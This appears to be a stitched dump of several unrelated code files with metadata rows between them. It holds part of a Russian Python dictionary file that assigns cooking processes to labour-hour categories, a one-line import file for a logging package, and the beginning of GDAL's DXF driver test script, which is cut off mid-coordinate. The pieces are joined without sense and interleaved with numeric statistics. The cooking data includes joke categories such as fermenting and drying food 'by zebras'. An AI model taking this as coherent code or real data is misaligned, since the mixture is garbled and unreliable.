#----
# Процессы (взбивание):
metadict_model['_-Взбивание крема (нормо-часов)'] = {
'_--Взбивание пищи (нормо-часов)':1,
}
metadict_model['_-Взбивание аквафабы (нормо-часов)'] = {
'_--Взбивание пищи (нормо-часов)':1,
}
#----
# Процессы (панировка, покрытия):
metadict_detail['_-Панировка грибов (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка запеканки (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка мелкой выпечки (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка овощей (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка овощей в масле (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_model['_-Натирание хлеба чесноком (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Смазывание оладьев соусом (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
#----
# Процессы (фаршировка):
metadict_model['_-Приготовление террина (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_model['_-Приготовление сэндвичей (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка блинчиков (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка булочек (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка вареников (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка голубцов (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка капкейков (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка пирожков (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка пиццы (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка рулета (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка средних овощей (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка тыквы (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
#----
# Процессы (смешивание, вымешивание):
metadict_model['_-Смешивание еды (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Смешивание питья (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Вымешивание пудинга (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Заворачивание пудинга (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Обминка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Разделка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Раскатка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Растягивание теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Формовка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_detail['_-Приготовление желе (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
#----
# Процессы (смешивание, вымешивание):
metadict_model['_-Смешивание сиропа (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание теста (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание соуса (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание мёда (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание пасты (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание рассола (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание раствора (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание соевого сусла (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (квашение, мочение):
metadict_model['_-Квашение капусты (нормо-часов)'] = {
'_--Квашение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Квашение овощей (нормо-часов)'] = {
'_--Квашение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Мочение фруктов (нормо-часов)'] = {
'_--Квашение пищи заранее (нормо-часов)':1,
}
#----
# Процессы (дрожжевое брожение):
metadict_model['_-Приготовление кваса (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление эля (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление закваски (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление опары (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление сидра (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление вина (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление соевого соуса (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Уход за грибковой культурой дрожжей (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уход за грибковой культурой темпе (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уход за грибковой культурой коджи (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
#----
# Процессы (маринование):
metadict_model['_-Маринование овощей (нормо-часов)'] = {
'_--Маринование пищи заранее (нормо-часов)':1,
}
metadict_model['_-Маринование грибов (нормо-часов)'] = {
'_--Маринование пищи заранее (нормо-часов)':1,
}
metadict_model['_-Маринование фруктов (нормо-часов)'] = {
'_--Маринование пищи заранее (нормо-часов)':1,
}
#----
# Процессы (соление):
metadict_detail['_-Соление грибов (нормо-часов)'] = {
'_--Соление пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Соление овощей (нормо-часов)'] = {
'_--Соление пищи заранее (нормо-часов)':1,
}
#----
# Процессы (ферментация):
metadict_model['_-Ферментация стручков ванили (нормо-часов)'] = {
# Хм, Ферментация зебрами! Я просто не могу удержаться.
'_--Ферментация пищи зебрами (нормо-часов)':1,
}
metadict_model['_-Ферментация кофейных зёрен (нормо-часов)'] = {
'_--Ферментация пищи зебрами (нормо-часов)':1,
}
metadict_model['_-Ферментация какао-бобов (нормо-часов)'] = {
'_--Ферментация пищи зебрами (нормо-часов)':1,
}
#----
# Процессы (проращивание, соложение):
metadict_detail['_-Проращивание бобов (нормо-часов)'] = {
'_--Проращивание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Проращивание зерна (нормо-часов)'] = {
'_--Проращивание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (замачивание, регидрация):
metadict_model['_-Замачивание бобов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание орехов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание грибов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание зерна (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание овощей (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание фруктов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание сладостей (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание риса (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (сушка, дегидрация):
metadict_detail['_-Сушка лапши (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка овощей (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка пастилы (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка сладостей (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка сухарей (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка трав (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка фруктов (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка ягод (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка грибов (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
#----
# Процессы (сушка, дегидрация):
metadict_detail['_-Сушка чайных листьев зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
metadict_detail['_-Сушка какао-бобов зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
metadict_detail['_-Сушка стручков ванили зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
metadict_detail['_-Сушка плодов кофейного дерева зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
#----
# Процессы (помол):
metadict_detail['_-Помол кофейных зёрен (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Помол пряностей (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Помол сахара-песка (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Помол сухарей (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
#----
# Процессы (шинковка):
metadict_detail['_-Шинковка грибов (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка зелени (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка овощей (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка орехов (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка фруктов (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
#----
# Процессы (нарезка):
metadict_detail['_-Нарезка зелени (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка лапши (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка овощей (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка орехов (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка темпе (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка фруктов (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка хлеба (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
#----
# Процессы (чистка):
metadict_detail['_-Чистка корнеплодов (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
metadict_detail['_-Чистка овощей (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
metadict_detail['_-Чистка орехов (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
metadict_detail['_-Чистка фруктов (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
#----
# Процессы (мытьё):
metadict_detail['_-Мытьё грибов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё корнеплодов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё крупы (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё овощей (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё орехов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё посуды (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё фруктов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
#----
# Процессы (сортировка):
metadict_detail['_-Сортировка корнеплодов (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
metadict_detail['_-Сортировка овощей (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
metadict_detail['_-Сортировка орехов (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
metadict_detail['_-Сортировка фруктов (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
#----
# Процессы (перебор):
metadict_detail['_-Перебор грибов (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
metadict_detail['_-Перебор овощей (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
metadict_detail['_-Перебор фруктов (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
metadict_detail['_-Перебор ягод (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
#----
# Процессы (перебор):
metadict_detail['_-Перебор бобов (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Перебор крупы (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Перебор сухофруктов (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Перебор трав (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
| 26.96169
| 98
| 0.593107
| 2,734
| 27,447
| 5.706291
| 0.07169
| 0.289725
| 0.159349
| 0.231395
| 0.827191
| 0.81655
| 0.795462
| 0.758541
| 0.697712
| 0.650215
| 0
| 0.010684
| 0.229278
| 27,447
| 1,017
| 99
| 26.988201
| 0.726813
| 0.045287
| 0
| 0.333333
| 0
| 0
| 0.574501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
16824d7dc74e4a6828a5e4da8b7dbf5dd4b3c9c4
| 173
|
py
|
Python
|
flog/__init__.py
|
mdhalse/flog
|
b8fae638cd23a935c71dc3670c30638aade5fca5
|
[
"MIT"
] | null | null | null |
flog/__init__.py
|
mdhalse/flog
|
b8fae638cd23a935c71dc3670c30638aade5fca5
|
[
"MIT"
] | null | null | null |
flog/__init__.py
|
mdhalse/flog
|
b8fae638cd23a935c71dc3670c30638aade5fca5
|
[
"MIT"
] | 2
|
2018-03-05T17:15:05.000Z
|
2021-03-13T03:29:00.000Z
|
from .flog import CorrelationLoggerAdapter, get_logger, log_call, log_sensitive_call
__all__ = ["CorrelationLoggerAdapter", "get_logger", "log_call", "log_sensitive_call"]
| 43.25
| 86
| 0.815029
| 20
| 173
| 6.45
| 0.5
| 0.418605
| 0.511628
| 0.55814
| 0.868217
| 0.868217
| 0.868217
| 0.868217
| 0
| 0
| 0
| 0
| 0.080925
| 173
| 3
| 87
| 57.666667
| 0.811321
| 0
| 0
| 0
| 0
| 0
| 0.346821
| 0.138728
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
168c9e0f7dfdabd3ef84931ae9ba4337960f1504
| 417,014
|
py
|
Python
|
autotest/ogr/ogr_dxf.py
|
vincentsarago/gdal
|
a04093a73abc2060c0c46f5f03f5940867a1f65d
|
[
"MIT"
] | 1
|
2021-04-10T21:03:13.000Z
|
2021-04-10T21:03:13.000Z
|
autotest/ogr/ogr_dxf.py
|
vincentsarago/gdal
|
a04093a73abc2060c0c46f5f03f5940867a1f65d
|
[
"MIT"
] | null | null | null |
autotest/ogr/ogr_dxf.py
|
vincentsarago/gdal
|
a04093a73abc2060c0c46f5f03f5940867a1f65d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test OGR DXF driver functionality.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2009, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2009-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
from sys import version_info
sys.path.append( '../pymod' )
import ogrtest
import gdaltest
from osgeo import gdal
from osgeo import ogr
###############################################################################
# Check some general things to see if they meet expectations.
def ogr_dxf_1():
gdaltest.dxf_ds = ogr.Open( 'data/assorted.dxf' )
if gdaltest.dxf_ds is None:
return 'fail'
if gdaltest.dxf_ds.GetLayerCount() != 1:
gdaltest.post_reason( 'expected exactly one layer!' )
return 'fail'
gdaltest.dxf_layer = gdaltest.dxf_ds.GetLayer(0)
if gdaltest.dxf_layer.GetName() != 'entities':
gdaltest.post_reason( 'did not get expected layer name.' )
return 'fail'
defn = gdaltest.dxf_layer.GetLayerDefn()
if defn.GetFieldCount() != 5:
gdaltest.post_reason( 'did not get expected number of fields.' )
return 'fail'
fc = gdaltest.dxf_layer.GetFeatureCount()
if fc != 22:
gdaltest.post_reason( 'did not get expected feature count, got %d' % fc)
return 'fail'
# Setup the utf-8 string.
if version_info >= (3,0,0):
gdaltest.sample_text = 'Text Sample1\u00BF\u03BB\n"abc"'
gdaltest.sample_style = 'Text Sample1\u00BF\u03BB\n\\"abc\\"'
else:
exec("gdaltest.sample_text = u'Text Sample1\u00BF\u03BB'")
gdaltest.sample_text += chr(10)
gdaltest.sample_style = gdaltest.sample_text + '\\"abc\\"'
gdaltest.sample_style = gdaltest.sample_style.encode('utf-8')
gdaltest.sample_text += '"abc"'
gdaltest.sample_text = gdaltest.sample_text.encode('utf-8')
return 'success'
###############################################################################
# Read the first feature, an ellipse and see if it generally meets expectations.
def ogr_dxf_2():
gdaltest.dxf_layer.ResetReading()
feat = gdaltest.dxf_layer.GetNextFeature()
if feat.Layer != '0':
gdaltest.post_reason( 'did not get expected layer for feature 0' )
return 'fail'
if feat.GetFID() != 0:
gdaltest.post_reason( 'did not get expected fid for feature 0' )
return 'fail'
if feat.SubClasses != 'AcDbEntity:AcDbEllipse':
gdaltest.post_reason( 'did not get expected SubClasses on feature 0.' )
return 'fail'
if feat.LineType != 'ByLayer':
gdaltest.post_reason( 'Did not get expected LineType' )
return 'fail'
if feat.EntityHandle != '43':
gdaltest.post_reason( 'did not get expected EntityHandle' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#000000)':
print( '%s' % feat.GetStyleString())
gdaltest.post_reason( 'did not get expected style string on feat 0.' )
return 'fail'
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbLineString25D:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
envelope = geom.GetEnvelope()
area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
exp_area = 1596.12
if area < exp_area - 0.5 or area > exp_area + 0.5:
gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
return 'fail'
if abs(geom.GetX(0)-73.25) > 0.001 or abs(geom.GetY(0)-139.75) > 0.001:
gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
% (geom.GetX(0),geom.GetY(0)) )
return 'fail'
return 'success'
###############################################################################
# Second feature should be a partial ellipse.
def ogr_dxf_3():
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
envelope = geom.GetEnvelope()
area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
exp_area = 311.864
if area < exp_area - 0.5 or area > exp_area + 0.5:
gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
return 'fail'
if abs(geom.GetX(0)-61.133) > 0.01 or abs(geom.GetY(0)-103.592) > 0.01:
gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
% (geom.GetX(0),geom.GetY(0)) )
return 'fail'
return 'success'
###############################################################################
# Third feature: point.
def ogr_dxf_4():
feat = gdaltest.dxf_layer.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT (83.5 160.0 0)' ):
return 'fail'
return 'success'
###############################################################################
# Fourth feature: LINE
def ogr_dxf_5():
feat = gdaltest.dxf_layer.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (97.0 159.5 0,108.5 132.25 0)' ):
return 'fail'
if feat.GetGeometryRef().GetGeometryType() == ogr.wkbLineString:
gdaltest.post_reason( 'not keeping 3D linestring as 3D' )
return 'fail'
return 'success'
###############################################################################
# Fourth feature: MTEXT
def ogr_dxf_6():
feat = gdaltest.dxf_layer.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT (84 126)' ):
return 'fail'
if feat.GetGeometryRef().GetGeometryType() == ogr.wkbPoint25D:
gdaltest.post_reason( 'not keeping 2D text as 2D' )
return 'fail'
if feat.GetStyleString() != 'LABEL(f:"Arial",t:"Test",a:30,s:5g,p:7,c:#000000)':
print(feat.GetStyleString())
gdaltest.post_reason( 'got wrong style string' )
return 'fail'
return 'success'
###############################################################################
# Partial CIRCLE
def ogr_dxf_7():
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
envelope = geom.GetEnvelope()
area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
exp_area = 445.748
if area < exp_area - 0.5 or area > exp_area + 0.5:
print(envelope)
gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
return 'fail'
if abs(geom.GetX(0)-115.258) > 0.01 or abs(geom.GetY(0)-107.791) > 0.01:
gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
% (geom.GetX(0),geom.GetY(0)) )
return 'fail'
return 'success'
###############################################################################
# Dimension
def ogr_dxf_8():
# Skip boring line.
feat = gdaltest.dxf_layer.GetNextFeature()
# Dimension lines
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbMultiLineString:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((63.8628719444825 149.209935992088,24.3419606685507 111.934531038653),(72.3255686642474 140.237438265109,63.0051995752285 150.119275371538),(32.8046573883157 102.962033311673,23.4842882992968 112.843870418103))' ):
return 'fail'
# Dimension arrowheads
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbPolygon25D:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((61.7583023958313 147.797704380064 0,63.8628719444825 149.209935992088 0,62.3300839753339 147.191478127097 0,61.7583023958313 147.797704380064 0))' ):
return 'fail'
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbPolygon25D:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((26.4465302172018 113.346762650677 0,24.3419606685507 111.934531038653 0,25.8747486376992 113.952988903644 0,26.4465302172018 113.346762650677 0))' ):
return 'fail'
# Dimension text
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
if ogrtest.check_feature_geometry( feat, 'POINT (42.815907752635709 131.936242584545397)' ):
return 'fail'
expected_style = 'LABEL(f:"Arial",t:"54.33",p:5,a:43.3,s:2.5g,c:#000000)'
if feat.GetStyleString() != expected_style:
gdaltest.post_reason( 'Got unexpected style string:\n%s\ninstead of:\n%s' % (feat.GetStyleString(),expected_style) )
return 'fail'
return 'success'
###############################################################################
# BLOCK (inlined)
def ogr_dxf_9():
# Skip two dimensions each with a line, two arrowheads and text.
for x in range(8):
feat = gdaltest.dxf_layer.GetNextFeature()
# block (merged geometries)
feat = gdaltest.dxf_layer.GetNextFeature()
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbMultiLineString25D:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((79.069506278985116 121.003652476272777 0,79.716898725419625 118.892590150942851 0),(79.716898725419625 118.892590150942851 0,78.140638855839953 120.440702522851453 0),(78.140638855839953 120.440702522851453 0,80.139111190485622 120.328112532167196 0),(80.139111190485622 120.328112532167196 0,78.619146316248077 118.920737648613908 0),(78.619146316248077 118.920737648613908 0,79.041358781314059 120.975504978601705 0))' ):
return 'fail'
# First of two MTEXTs
feat = gdaltest.dxf_layer.GetNextFeature()
if feat.GetField( 'Text' ) != gdaltest.sample_text:
gdaltest.post_reason( 'Did not get expected first mtext.' )
return 'fail'
expected_style = 'LABEL(f:"Arial",t:"'+gdaltest.sample_style+'",a:45,s:0.5g,p:5,c:#000000)'
if feat.GetStyleString() != expected_style:
gdaltest.post_reason( 'Got unexpected style string:\n%s\ninstead of:\n%s.' % (feat.GetStyleString(),expected_style) )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT (77.602201427662891 120.775897075866169 0)' ):
return 'fail'
# Second of two MTEXTs
feat = gdaltest.dxf_layer.GetNextFeature()
if feat.GetField( 'Text' ) != 'Second':
gdaltest.post_reason( 'Did not get expected second mtext.' )
return 'fail'
if feat.GetField( 'SubClasses' ) != 'AcDbEntity:AcDbMText':
gdaltest.post_reason( 'Did not get expected subclasses.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT (79.977331629005178 119.698291706738644 0)' ):
return 'fail'
return 'success'
###############################################################################
# LWPOLYLINE in an Object Coordinate System.
def ogr_dxf_10():
ocs_ds = ogr.Open('data/LWPOLYLINE-OCS.dxf')
ocs_lyr = ocs_ds.GetLayer(0)
# Skip boring line.
feat = ocs_lyr.GetNextFeature()
# LWPOLYLINE in OCS
feat = ocs_lyr.GetNextFeature()
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbLineString25D:
print(geom.GetGeometryType())
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'LINESTRING (600325.567999998573214 3153021.253000000491738 562.760000000052969,600255.215999998385087 3151973.98600000096485 536.950000000069849,597873.927999997511506 3152247.628000000491738 602.705000000089058)' ):
return 'fail'
# LWPOLYLINE in OCS with bulge
feat = ocs_lyr.GetFeature(12)
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (611415.459819656 3139300.00002682 1807.37309215522,611245.079665823 3139720.59876424 1807.37309215522,611245.079665823 3139720.59876424 1807.37309215522,611244.054791235 3139723.12875936 1807.27984293229,611243.034695086 3139725.64695847 1807.00053001486,611242.024133533 3139728.14162057 1806.53645568869,611241.027818282 3139730.6011144 1805.88978368251,611240.050394615 3139733.01397265 1805.06352907972,611239.096419732 3139735.36894547 1804.06154426071,611238.170341503 3139737.65505289 1802.88850094122,611237.276477734 3139739.86163602 1801.54986839073,611236.418996029 3139741.97840675 1800.0518879321,611235.601894365 3139743.99549572 1798.40154384175,611234.828982446 3139745.90349832 1796.60653078564,611234.103863944 3139747.69351857 1794.67521794327,611233.429919697 3139749.35721058 1792.61660998662,611232.810291944 3139750.88681743 1790.44030509629,611232.247869676 3139752.27520739 1788.15645021029,611231.745275164 3139753.51590716 1785.77569371438,611231.304851737 